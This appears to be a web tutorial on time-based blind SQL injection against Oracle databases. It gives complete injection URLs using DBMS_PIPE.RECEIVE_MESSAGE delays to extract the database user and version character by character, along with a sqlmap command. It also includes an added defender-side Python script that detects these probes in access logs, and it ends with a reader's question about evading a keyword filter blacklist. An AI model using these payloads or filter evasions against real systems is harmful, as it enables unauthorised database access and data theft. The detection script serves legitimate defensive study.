To get the current database user
http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+FROM+DUAL),1,1))=68)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END)

If the page loads with a delay of five seconds, then the first character has ASCII value 68, i.e. 'D'.

http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+FROM+DUAL),2,1))=117)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END)

If the page loads with a delay of five seconds, then the second character has ASCII value 117, i.e. 'u'. The same method can be applied to determine the rest of the characters.
To get the backend database version
http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(banner+AS+VARCHAR(4000)),CHR(32))+FROM+v$version),1,1))=79)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END)

If the page loads with a delay of five seconds, then the first character has ASCII value 79, i.e. 'O'.

http://www.site.com/page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(banner+AS+VARCHAR(4000)),CHR(32))+FROM+v$version),2,1))=114)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END)

If the page loads with a delay of five seconds, then the second character has ASCII value 114, i.e. 'r'. And so on.
To carry out time-based blind Oracle injection with sqlmap
./sqlmap.py -u "http://www.site.com/page.jsp?id=5" -b --dbms="oracle" --technique="T"
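As an added, defender-side example (not from the original post), the Python script below scans web-server access-log lines for the DBMS_PIPE.RECEIVE_MESSAGE / CASE WHEN probe shown above, uses each request's recorded response time to tell which guesses actually triggered the delay, and reassembles the characters that were confirmed. The log lines are constructed, and their format (method, path, status, elapsed milliseconds) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the page): method, path, status, response time in ms.
SAMPLE_LOG = [
    "GET /page.jsp?id=5 200 12",
    "GET /page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+FROM+DUAL),1,1))=68)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) 200 5014",
    "GET /page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+FROM+DUAL),2,1))=116)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) 200 15",
    "GET /page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(USER+AS+VARCHAR(4000)),CHR(32))+FROM+DUAL),2,1))=117)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) 200 5009",
    "GET /page.jsp?id=5+AND+1=(CASE+WHEN+(ASCII(SUBSTRC((SELECT+NVL(CAST(banner+AS+VARCHAR(4000)),CHR(32))+FROM+v$version),1,1))=79)+THEN+DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(98)||CHR(99)||CHR(100),5)+ELSE+1+END) 200 5020",
]

# The sleep primitive used on the page: DBMS_PIPE.RECEIVE_MESSAGE(<pipe name>, <timeout seconds>).
DELAY_RE = re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\([^,]*,\s*(\d+)\s*\)", re.I)
# The per-character oracle: ASCII(SUBSTR[C]((SELECT <expr> FROM <source>), <pos>, 1)) = <code>.
PROBE_RE = re.compile(
    r"ASCII\s*\(\s*SUBSTRC?\s*\(\s*\(\s*SELECT\s+(.+?)\s+FROM\s+([\w$]+)\s*\)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*=\s*(\d+)",
    re.I,
)

def analyse(line):
    """Return a finding dict for a request carrying the time-based payload, else None."""
    _method, path, _status, elapsed = line.split()
    elapsed = int(elapsed)
    query = unquote_plus(path.partition("?")[2])  # '+' becomes space, %xx is decoded
    delay = DELAY_RE.search(query)
    if not delay:
        return None
    delay_s = int(delay.group(1))
    # The conditional branch fired if the response took at least the requested sleep.
    finding = {"delay_s": delay_s, "elapsed_ms": elapsed, "fired": elapsed >= delay_s * 1000}
    probe = PROBE_RE.search(query)
    if probe:
        finding.update(source=probe.group(2).upper(),
                       position=int(probe.group(3)), guess=chr(int(probe.group(4))))
    return finding

def reconstruct(lines):
    """Per queried source, join the characters whose guesses fired; '?' marks positions never confirmed."""
    leaked = {}
    for line in lines:
        f = analyse(line)
        if f and f["fired"] and "position" in f:
            leaked.setdefault(f["source"], {})[f["position"]] = f["guess"]
    return {src: "".join(chars.get(p, "?") for p in range(1, max(chars) + 1))
            for src, chars in leaked.items()}

if __name__ == "__main__":
    print(reconstruct(SAMPLE_LOG))
```

A baseline response time should be measured per endpoint before trusting the fired flag, since a slow page can exceed the sleep on its own.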
A very good Oracle SQL injection cheat sheet is available here.
Hello! I have an injection dot, but "'|\"|\\*|\\\\|<|>|\\(|\\)|!|;|exec|chr|char|bin|hex|oct|concat|and|select|update|insert|delete|union|from|between|trim|replace|reverse|set|mid|conv|load_file" has been filtered. Can I bypass it with `select * from tables where name=INPUT` to get the name? Thanks